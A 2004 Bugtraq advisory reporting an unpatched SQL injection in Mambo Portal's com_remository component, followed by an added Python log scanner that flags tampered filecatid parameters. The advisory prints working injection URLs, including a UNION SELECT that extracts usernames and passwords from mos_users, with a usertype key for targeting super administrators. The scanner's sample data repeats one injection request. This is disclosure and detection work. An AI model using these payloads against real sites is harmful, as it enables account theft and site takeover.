Mambo Portal latest version 4.5.1 (1.09) and lower versions: SQL injection Vulnerability.
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Mambo Portal latest version 4.5.1 (1.09) and lower versions: SQL injection Vulnerability.
- From: khoaimi <kh0aimi@xxxxxxxxx>
- Date: 18 Sep 2004 03:39:46 -0000
Vendor
www.mamboportal.com
Message from vendor : Mambo is one of the most powerful Open Source Content 
Management Systems on the planet. It is used all over the world for everything 
from simple websites to complex corporate applications. Mambo is easy to 
install, simple to manage, and reliable. 
Bug name : SQL injection
Version : latest version 4.5.1(1.0.9) and lower.
Exploit :
http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
Data can be read from the table "mos_users" with the query below:
http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*
with the values of usertype : 
 0 = superadministrator
 1 = administrator
 2 = editor
 3 = user
 5 = publisher
 6 = manager
Vendor feedback :
Not yet
Vendor patch :
Not yet
khoai
www.xfrog.org
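
Since no vendor patch is listed, web server logs are the practical place to look for this issue. The following is an added example, not part of the original advisory or of Mambo's code: it scans access-log lines for com_remository requests whose filecatid is not a plain integer. It assumes Common/Combined Log Format and that legitimate filecatid values are purely numeric (as in the advisory's filecatid=499); the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate filecatid is ASCII digits only.
NUMERIC_RE = re.compile(r"[0-9]+")


def filecatid_is_tampered(target):
    """True for a com_remository request whose filecatid is not a plain integer."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_remository" not in query.get("option", []):
        return False
    # parse_qs percent-decodes values: "499%20and%201=0/*" becomes "499 and 1=0/*".
    return any(not NUMERIC_RE.fullmatch(v) for v in query.get("filecatid", []))


def scan(log_lines):
    """Return (client_ip, request_target) for every flagged log line."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and filecatid_is_tampered(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Sep/2004:03:40:01 +0000] "GET /index.php?option=com_remository'
    '&Itemid=27&func=fileinfo&parent=folder&filecatid=499 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Sep/2004:03:41:12 +0000] "GET /index.php?option=com_remository'
    '&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0/* HTTP/1.1" 200 312',
    '203.0.113.5 - - [18/Sep/2004:03:42:30 +0000] "GET /index.php?option=com_content'
    '&task=view&id=12 HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(f"suspicious filecatid from {ip}: {target}")
```

The same integer-only rule can be enforced in front of the application (for example as a request filter) until a fix is available.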